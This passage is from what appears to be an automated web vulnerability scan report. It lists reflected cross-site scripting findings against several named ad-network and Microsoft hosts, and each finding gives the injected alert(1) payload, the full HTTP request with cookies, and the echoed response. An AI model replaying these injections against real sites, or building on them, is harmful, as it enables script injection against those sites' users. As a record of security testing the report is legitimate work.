Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:28:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/RTB/1845546852/x24f0ee0"><script>alert(1)</script>4c14aa33ca3/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.138. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/12132898267@x24

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a02"><script>alert(1)</script>acc281e1e55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa8a02"><script>alert(1)</script>acc281e1e55/RTB/12132898267@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa8a02"><script>alert(1)</script>acc281e1e55/RTB/1664534484/x24/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.139. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/12132898267@x24

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54433"><script>alert(1)</script>83320e70f1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/RTB54433"><script>alert(1)</script>83320e70f1f/12132898267@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/RTB54433"><script>alert(1)</script>83320e70f1f/2113516053/x24/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.140. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/RTB/12132898267@x24

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a284"><script>alert(1)</script>437323a56d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/RTB/12132898267@x243a284"><script>alert(1)</script>437323a56d4?USNetwork/PizzaHut_2H_201008_ZT_18-49_All HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/RTB/1934000924/x243a284"><script>alert(1)</script>437323a56d4/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><IMG
...[SNIP]...

6.141. http://ds.addthis.com/red/psi/sites/krypt.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/krypt.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2fc64<script>alert(1)</script>5482395f618 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/krypt.com/p.json?callback=_ate.ad.hpr2fc64<script>alert(1)</script>5482395f618&uid=4dab4fa85facd099&url=http%3A%2F%2Fkrypt.com%2Fdedicated%2F&ref=http%3A%2F%2Fkrypt.com%2F&yrfn6b HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303529621.60|1303529621.1FE; dt=X; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 444
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 24 Apr 2011 16:35:03 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24 May 2011 16:35:03 GMT; Path=/
Set-Cookie: di=%7B%7D..1303662903.1FE|1303662903.1OD|1303662903.60; Domain=.addthis.com; Expires=Tue, 23-Apr-2013 16:35:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 24 Apr 2011 16:35:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:35:03 GMT
Connection: close

_ate.ad.hpr2fc64<script>alert(1)</script>5482395f618({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degrees.com/orbser
...[SNIP]...

6.142. http://ds.addthis.com/red/psi/sites/www.krypt.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.krypt.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64653<script>alert(1)</script>0f55ba53689 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.krypt.com/p.json?callback=_ate.ad.hpr64653<script>alert(1)</script>0f55ba53689&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.krypt.com%2Fwhy-us%2Fnetwork%2F&ref=http%3A%2F%2Fkrypt.com%2Fdedicated%2F&tpbrif HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 24 Apr 2011 16:41:13 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24 May 2011 16:41:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 24 Apr 2011 16:41:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:41:13 GMT
Connection: close

_ate.ad.hpr64653<script>alert(1)</script>0f55ba53689({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

6.143. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 98ed0<script>alert(1)</script>82d8bb5aab2 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_28966898ed0<script>alert(1)</script>82d8bb5aab2&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C8BADFB2649DAACCD3E1635ED3EF64F7; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sun, 24 Apr 2011 12:30:39 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966898ed0<script>alert(1)</script>82d8bb5aab2");

6.144. http://hellometro.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hellometro.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1f31'-alert(1)-'294751a8876 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=27851&c1f31'-alert(1)-'294751a8876=1 HTTP/1.1
Host: hellometro.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviRpSoAA-; Domain=.intellitxt.com; Expires=Thu, 23-Jun-2011 20:01:34 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviRpSoQA-; Domain=.intellitxt.com; Expires=Thu, 23-Jun-2011 20:01:34 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 20:01:34 GMT
Age: 0
Connection: keep-alive
Content-Length: 11735

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
le,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://hellometro.us.intellitxt.com';$iTXT.js.pageQuery='ipid=27851&c1f31'-alert(1)-'294751a8876=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

6.145. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c2997<img%20src%3da%20onerror%3dalert(1)>2b012b06669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2997<img src=a onerror=alert(1)>2b012b06669 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-us&watermark=MSDN&focusOnInit=false&c2997<img%20src%3da%20onerror%3dalert(1)>2b012b06669=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303556497823:ss=1303555133331; ADS=SN=175A21EF; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ntCoent-Length: 12909
Content-Type: application/x-javascript
ETag: eb29e781865a6201f23dcc1a5e342143
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB31
Cache-Control: public, max-age=43200
Expires: Mon, 25 Apr 2011 03:59:08 GMT
Date: Sun, 24 Apr 2011 15:59:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12909


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&c2997<img src=a onerror=alert(1)>2b012b06669=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search MSDN w
...[SNIP]...

6.146. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ca24<img%20src%3da%20onerror%3dalert(1)>1fa6ef79a7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ca24<img src=a onerror=alert(1)>1fa6ef79a7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&Refinement=28&focusOnInit=false&5ca24<img%20src%3da%20onerror%3dalert(1)>1fa6ef79a7d=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/edge/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; ADS=SN=175A21EF; WT_NVR_RU=0=technet|msdn:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649894761:ss=1303649859266

Response

HTTP/1.1 200 OK
ntCoent-Length: 12929
Content-Type: application/x-javascript
ETag: 3000876464d6433585afa9bb2303596a
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Cache-Control: public, max-age=43200
Expires: Mon, 25 Apr 2011 04:00:56 GMT
Date: Sun, 24 Apr 2011 16:00:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12929


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
wEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=28&5ca24<img src=a onerror=alert(1)>1fa6ef79a7d=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

6.147. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8aa8<img%20src%3da%20onerror%3dalert(1)>3a6c178e794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8aa8<img src=a onerror=alert(1)>3a6c178e794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&Refinement=28&focusOnInit=false&b8aa8<img%20src%3da%20onerror%3dalert(1)>3a6c178e794=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/edge/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; ADS=SN=175A21EF; WT_NVR_RU=0=technet|msdn:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649875853:ss=1303649859266

Response

HTTP/1.1 200 OK
ntCoent-Length: 12929
Content-Type: application/x-javascript
ETag: 89f00efab9c3fb7790d6fc61dde0d2d8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB37
Cache-Control: public, max-age=43200
Expires: Mon, 25 Apr 2011 04:00:32 GMT
Date: Sun, 24 Apr 2011 16:00:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12929


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
wEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=28&b8aa8<img src=a onerror=alert(1)>3a6c178e794=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
